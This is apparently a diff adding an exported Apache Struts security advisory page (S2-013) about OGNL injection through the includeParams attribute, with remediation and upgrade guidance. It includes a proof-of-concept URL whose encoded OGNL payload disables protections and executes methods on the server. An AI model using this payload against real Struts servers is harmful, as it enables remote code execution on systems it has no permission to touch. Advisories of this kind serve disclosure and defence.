+<P>Both the <A href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html" class="external-link" rel="nofollow"><EM>s:url</EM></A> and <A href="http://struts.apache.org/release/2.1.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html" class="external-link" rel="nofollow"><EM>s:a</EM></A> tag provide an <EM>includeParams</EM> attribute. </P>
+
+<P>The main scope of that attribute is to understand whether includes http request parameter or not. </P>
+
+<P>The allowed values of includeParams are:</P>
+<OL>
+ <LI><EM>none</EM> - include no parameters in the URL (default)</LI>
+ <LI><EM>get</EM> - include only GET parameters in the URL</LI>
+ <LI><EM>all</EM> - include both GET and POST parameters in the URL</LI>
+</OL>
+
+
+<P>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <EM>URL</EM> or <EM>A</EM> tag , which will cause a further evaluation. </P>
+
+<P>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<BR>
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</P>
+
+<H2><A name="S2-013-Proofofconcept"></A>Proof of concept</H2>
+
+<OL>
+ <LI>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+ includeParams=<SPAN class="code-quote">"all"</SPAN>
+</PRE>
+</DIV></DIV>
+<P>Such that the line will be something look like this:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><s:url id=<SPAN class="code-quote">"url"</SPAN> action=<SPAN class="code-quote">"HelloWorld"</SPAN> includeParams=<SPAN class="code-quote">"all"</SPAN>></SPAN>
+</PRE>
+</DIV></DIV>
+<P>(it works also with <EM>includeParams="get"</EM>).</P></LI>
+ <LI>Run struts2-blank app</LI>
+ <LI>Open the url: <A href="http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23writer.println('hacked'),%23writer.close())%7D" class="external-link" rel="nofollow">http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D</A><BR>
+ (this is the shortened version <A href="http://goo.gl/lhlTl" class="external-link" rel="nofollow">http://goo.gl/lhlTl</A>)</LI>
+</OL>
+
+
+<P>As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter. </P>
+
+<H2><A name="S2-013-Solution"></A>Solution</H2>
+
+<P>The OGNLUtil class was changed to deny eval expressions by default. </P>
+
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward Compatibility</B><BR>In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (<B>use it at your own risk</B>).
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><constant name=<SPAN class="code-quote">"struts.ognl.enableOGNLEvalExpression"</SPAN> value=<SPAN class="code-quote">"true"</SPAN> /></SPAN>
+</PRE>
+</DIV></DIV>
+<P>Please, ensure that:</P>
+<OL>
+ <LI>there are no <EM>includeParams</EM> with "all" or "get" value</LI>
+ <LI>every parameter which is declared inside the <EM>u</EM> or <EM>a</EM> tag come from a sanitized input.</LI>
+</OL>
+</TD></TR></TABLE></DIV>
+
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is strongly recommended to upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A>, which contains the corrected OGNL and XWork library.</B></TD></TR></TABLE></DIV>
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file